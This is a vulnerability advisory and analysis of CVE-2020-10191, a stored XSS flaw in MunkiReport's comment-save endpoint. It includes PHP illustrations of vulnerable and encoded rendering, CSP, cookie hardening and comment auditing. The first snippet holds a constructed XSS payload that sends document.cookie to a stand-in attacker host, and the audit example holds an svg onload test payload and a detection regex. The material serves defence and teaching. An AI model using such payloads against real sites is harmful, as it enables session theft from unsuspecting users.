CVE-2020-10191 in MunkiReport
Summary
by MITRE
An issue was discovered in MunkiReport before 5.3.0. An authenticated actor can send a custom XSS payload through the /module/comment/save endpoint. The payload will be executed by any authenticated users browsing the application. This concerns app/controllers/client.php:detail.
Analysis
by VulDB Data Team • 05/11/2025
This is a stored cross-site scripting flaw in the MunkiReport web application affecting versions before 5.3.0. The /module/comment/save endpoint accepts comment text from any authenticated user and stores it without neutralizing markup, and the client detail view implemented in app/controllers/client.php:detail later renders that stored text into the page without output encoding. An authenticated attacker therefore only needs to submit a comment containing a script payload; it executes in the browser of every authenticated user who opens the affected client's detail page. Because the payload lives in the database rather than in a single crafted URL, this is stored (persistent) XSS, not reflected XSS. The root cause is the combination of missing input validation at the save endpoint and missing context-aware output encoding at render time, the weakness catalogued as CWE-79 (Improper Neutralization of Input During Web Page Generation). The impact is on confidentiality and integrity: the attacker's JavaScript runs with the privileges of the viewing user's session, so it can read anything that user can see and issue requests the application attributes to that user, including a user whose role is higher than the attacker's own.
The operational impact goes beyond reading data from a single page. When an authenticated user opens the client detail page that carries the malicious comment, the payload runs automatically in that user's browser. It can exfiltrate the session cookie if the cookie is not marked HttpOnly, and even when it is, the script can still send requests from inside the victim's authenticated session, redirect the user to an attacker-controlled site, or change data on the victim's behalf. The payload persists until the comment is deleted from the database, so every authenticated user who views that client is affected for as long as it remains. The attack requires nothing more than a valid account that is allowed to post comments, which makes it particularly dangerous where many administrators share the deployment and a low-privileged account can target a high-privileged one. In ATT&CK terms the execution maps to T1059.007 (Command and Scripting Interpreter: JavaScript), and theft of the victim's session cookie maps to T1539 (Steal Web Session Cookie).
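The following PHP fragment is an added illustration of the pattern described above, not code from MunkiReport. The comment string, the `renderComment*` functions and the `showComment` JavaScript callee are constructed for the example; it shows how a stored comment becomes executable when dropped into the HTML unchanged, and how context-appropriate output encoding neutralizes the same string.

```php
<?php
// Added illustration, not MunkiReport code. The comment text and the
// render functions below are constructed for this example.

// Constructed sample of what an authenticated attacker could POST to a
// comment-save endpoint. Assume it is stored verbatim in the database.
$storedComment = '<img src=x onerror="fetch(\'https://attacker.example/c?\'+document.cookie)">';

// Vulnerable pattern (hypothetical): the stored string is placed into the
// client-detail HTML unchanged, so the browser parses the <img> tag and runs
// the onerror handler for every user who opens the page.
function renderCommentVulnerable(string $comment): string
{
    return "<div class=\"comment\">$comment</div>";
}

// Hardened pattern: encode for the HTML text context at output time.
// ENT_QUOTES escapes both quote styles; ENT_SUBSTITUTE replaces invalid
// UTF-8 instead of returning an empty string, which would silently drop
// a legitimate comment.
function renderCommentSafe(string $comment): string
{
    $encoded = htmlspecialchars($comment, ENT_QUOTES | ENT_SUBSTITUTE | ENT_HTML5, 'UTF-8');
    return "<div class=\"comment\">$encoded</div>";
}

// If the comment is instead embedded in a JavaScript string, HTML escaping is
// the wrong encoder. json_encode with the HEX flags makes sure that </script>
// and quote characters cannot terminate the script context.
function renderCommentForJs(string $comment): string
{
    $json = json_encode(
        $comment,
        JSON_HEX_TAG | JSON_HEX_AMP | JSON_HEX_APOS | JSON_HEX_QUOT | JSON_UNESCAPED_UNICODE
    );
    return "<script>showComment($json);</script>";
}

echo renderCommentVulnerable($storedComment), PHP_EOL;
echo renderCommentSafe($storedComment), PHP_EOL;
echo renderCommentForJs($storedComment), PHP_EOL;
```

Run the file once and compare the three lines: the first is the tag the browser will execute, the second shows the same characters as inert entities, and the third shows the string quoted as a JSON literal. The lesson for any similar endpoint is that the encoder must match the context the data lands in (HTML body, attribute, JavaScript string), and that encoding at output time protects regardless of what was stored.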
Organizations running MunkiReport versions before 5.3.0 should upgrade to 5.3.0 or later as the primary fix, since that release addresses the comment handling that allows the payload to be injected. Upgrading does not by itself guarantee that payloads stored before the upgrade are gone, so the comment data should be searched for markup and any suspicious entries removed after patching. Defense in depth that limits the impact of this and similar flaws includes a Content Security Policy that disallows inline script execution (a policy that permits 'unsafe-inline' gives no protection against inline event handlers), consistent context-aware output encoding for all user-supplied content, and HttpOnly, Secure and SameSite attributes on the session cookie so that a script cannot simply read and replay it. Application-level logging of comment submissions, including the acting user and whether the text contains markup, is more useful for detecting abuse than generic network monitoring, because the request itself is ordinary authenticated HTTPS traffic. A web application firewall can block the most common payload shapes before they are stored but is easily bypassed by encoding variations and should not be relied on as the fix. Finally, review who is permitted to post comments and other user-generated content, and keep regular patch management in place so that web application updates of this kind are applied promptly.
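As an added example of the mitigations above (not MunkiReport code), the PHP below contrasts a weak CSP with a nonce-based one, hardens the session cookie, and logs comment submissions with a simple markup heuristic. The `/csp-report` endpoint, the log format, and the `auditCommentSave` handler are assumptions for illustration only.

```php
<?php
// Added example, not MunkiReport code. Header values, the /csp-report
// endpoint and the audit log format are assumptions for illustration.

// Weak policy: 'unsafe-inline' re-enables inline event handlers such as
// onerror="...", so a stored payload of that shape still runs.
const CSP_WEAK = "default-src 'self'; script-src 'self' 'unsafe-inline'";

// Hardened policy: scripts only from the same origin or carrying the
// per-response nonce; inline handlers and javascript: URLs are blocked.
function buildCsp(string $nonce): string
{
    return "default-src 'self'; "
         . "script-src 'self' 'nonce-$nonce'; "
         . "object-src 'none'; base-uri 'self'; "
         . "report-uri /csp-report";
}

// Call before any output. Returns the nonce so the application's own
// inline <script nonce="..."> tags can carry it.
function sendSecurityHeaders(): string
{
    $nonce = base64_encode(random_bytes(16));
    header('Content-Security-Policy: ' . buildCsp($nonce));
    header('X-Content-Type-Options: nosniff');
    return $nonce;
}

// Session cookie flags: HttpOnly keeps document.cookie from exposing the
// session id, Secure restricts it to HTTPS, SameSite limits cross-site use.
function hardenSessionCookie(): void
{
    session_set_cookie_params([
        'lifetime' => 0,
        'path'     => '/',
        'domain'   => '',
        'secure'   => true,
        'httponly' => true,
        'samesite' => 'Strict',
    ]);
}

// Audit hook for a comment-save handler: record every submission with the
// acting user and flag ones containing markup, so stored payloads can be
// found and removed. The regex is a coarse heuristic and will produce some
// false positives; it is a triage signal, not the security control.
function auditCommentSave(string $user, string $serial, string $comment): array
{
    $suspicious = (bool) preg_match('/<\s*\/?\s*[a-z]|javascript:|\bon[a-z]+\s*=/i', $comment);
    $entry = [
        'ts'         => gmdate('c'),
        'event'      => 'comment.save',
        'user'       => $user,
        'serial'     => $serial,
        'len'        => strlen($comment),
        'suspicious' => $suspicious,
    ];
    error_log(json_encode($entry));
    return $entry;
}

// Constructed usage: a benign comment and a script-bearing one.
hardenSessionCookie();
auditCommentSave('admin', 'C02XYZ', 'Replaced battery, ticket 4421');
auditCommentSave('helpdesk', 'C02XYZ', '<svg onload=alert(document.domain)>');
```

Apply `sendSecurityHeaders()` at the top of every page response and attach the returned nonce to the application's own inline scripts; anything else inline, including a stored payload that slips past encoding, is refused by the browser and surfaces as a violation report. The audit entries give incident responders the user, client and timestamp needed to trace and remove a stored payload.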